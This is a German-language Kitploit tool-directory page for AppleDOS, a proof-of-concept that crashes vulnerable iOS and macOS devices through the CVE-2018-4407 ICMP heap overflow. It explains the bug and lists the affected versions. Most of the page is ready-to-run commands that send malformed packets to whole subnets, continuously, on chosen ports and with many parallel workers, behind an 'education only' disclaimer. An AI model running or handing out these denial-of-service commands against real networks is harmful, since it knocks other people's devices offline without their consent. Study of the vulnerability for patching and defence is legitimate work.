Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
AppleDOS — Stören von Apple-Geräten im Netzwerk mit CVE-2018-4407 (Heap-Überlauf bei fehlerhafter Paketverarbeitung) | Kitploit
Tools/GitHubGitHub/farisv/appledos
SchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsLernen & Bildung
GitHubfarisv/appledos

AppleDOS

Stören von Apple-Geräten im Netzwerk mit CVE-2018-4407 (Heap-Überlauf bei fehlerhafter Paketverarbeitung)

Repository anzeigen
256vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

AppleDOS (CVE-2018-4407)

Basierend auf CVE-2018-4407 (https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407), diesem Tweet und diesem Video. Der Fehler ist eine Heap-Überlauf-Schwachstelle in der Behandlung fehlerhafter Pakete, wenn das Betriebssystem versucht, eine ICMP-Nachricht zu senden, die Segmente des fehlerhaften Pakets enthält, an den Absender zurück.

Dieser POC stürzt die anfälligen Apple-Geräte ab, indem er fehlerhafte TCP-Paketdaten mit langen TCP/IP-Header-Optionen sendet, um die ICMP-Nachricht zu überlaufen, wenn das Gerät versucht, die Fehlermeldung zu senden. Sie benötigen die Fähigkeit, Netzwerkpaketdaten direkt an das Gerät zu senden (z. B. im selben lokalen Netzwerk).

Die folgenden Betriebssystemversionen und Geräte sind anfällig:

  • Apple iOS 11 und früher: alle Geräte
  • Apple macOS High Sierra, bis einschließlich 10.13.6: alle Geräte
  • Apple macOS Sierra, bis einschließlich 10.12.6: alle Geräte
  • Apple OS X El Capitan und früher: alle Geräte

WARNUNG

NUR ZU BILDUNGSZWECKEN. VERWENDEN SIE DIESES SKRIPT NICHT FÜR ILLEGALE AKTIVITÄTEN. DER AUTOR ÜBERNIMMT KEINE HAFTUNG FÜR MISSBRAUCH ODER SCHÄDEN.

Beispiel

Stellen Sie sicher, dass Sie Python 3 und scapy installiert haben.

root@kitploit:~
pip install scapy
# or
pip3 install scapy

Möglicherweise müssen Sie das Skript als root ausführen.

Senden Sie ein schlechtes Paket an das Subnetz 192.168.1.0/24.

root@kitploit:~
sudo ./appledos.py 192.168.1.0/24

Zeigt die IP nach dem Senden des Pakets an.

root@kitploit:~
sudo ./appledos.py --verbose 192.168.1.0/24

Senden Sie kontinuierlich ein schlechtes Paket an das Subnetz 192.168.1.0/24.

root@kitploit:~
sudo ./appledos.py --continuous 192.168.1.0/24

Ändern Sie den Zielport (Standard: 80). Sie können jeden Port ändern, da Geräte auf jedes eingehende Paket auf jedem Port antworten, aber Sie sollten die Portsperre oder Firewall im Host oder Netzwerk beachten.

root@kitploit:~
sudo ./appledos.py --continuous --port 22 192.168.1.0/24

Senden Sie ein schlechtes Paket nur an eine IP.

root@kitploit:~
sudo ./appledos.py 192.168.1.118

Legen Sie die maximale Anzahl von Arbeitern fest (Standard: 100).

root@kitploit:~
sudo ./appledos.py --worker 10 192.168.1.0/24

Hinweis

Dieses Skript verwendet scapy und es gibt ein bekanntes Problem bei der Handhabung von /dev/bpf (Berkeley Packet Filter) beim Senden von Paketdaten von einem Betriebssystem wie macOS mit Multi-Threading. Wenn Sie No /dev/bpf handle is available erhalten, versuchen Sie, die Arbeiteranzahl auf 1 oder 2 zu reduzieren. Oder verwenden Sie einfach Linux wie im Demonstrationsvideo.

Tool herunterladen